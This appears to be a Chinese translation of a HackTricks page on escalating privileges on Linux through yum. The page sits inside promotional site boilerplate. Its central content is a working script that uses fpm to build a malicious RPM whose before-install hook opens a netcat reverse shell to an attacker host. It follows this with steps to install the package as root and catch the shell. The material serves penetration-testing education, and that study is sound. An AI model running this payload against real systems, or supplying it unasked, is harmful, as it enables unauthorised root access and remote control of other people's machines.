hacktricks/linux-unix/privilege-escalation/exploiting-yum.md

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！

• 发现我们的独家NFT收藏品The PEASS Family

• 获取官方PEASS和HackTricks周边产品

• 加入 💬 Discord群组 或 Telegram群组 或 关注我在Twitter上的🐦@carlospolopm.

• 通过向hacktricks仓库和hacktricks-cloud仓库提交PR来分享你的黑客技巧。

在gtfobins上还可以找到关于yum的更多示例。

通过RPM软件包执行任意命令

检查环境

为了利用这个向量，用户必须能够以更高权限的用户（即root）执行yum命令。

这个向量的一个工作示例

在tryhackme的daily bugle房间中可以找到这个漏洞的一个工作示例。

打包一个RPM

在下面的部分中，我将介绍如何使用fpm将一个反向shell打包到RPM中。

下面的示例创建了一个包，其中包含一个before-install触发器，其中包含一个可以由攻击者定义的任意脚本。安装时，该软件包将执行任意命令。我使用了一个简单的反向netcat shell示例进行演示，但可以根据需要进行更改。

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

捕获一个shell

使用上面的示例，假设yum可以以更高权限的用户执行。

1. 将rpm传输到主机
2. 在本地主机上启动监听器，例如示例netcat监听器
3. 安装易受攻击的软件包yum localinstall -y exploited-1.0-1.noarch.rpm

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！

• 发现我们的独家NFT收藏品The PEASS Family

• 获得官方PEASS和HackTricks周边产品

• 加入💬 Discord群组或电报群组，或在Twitter上关注我🐦@carlospolopm。

• 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。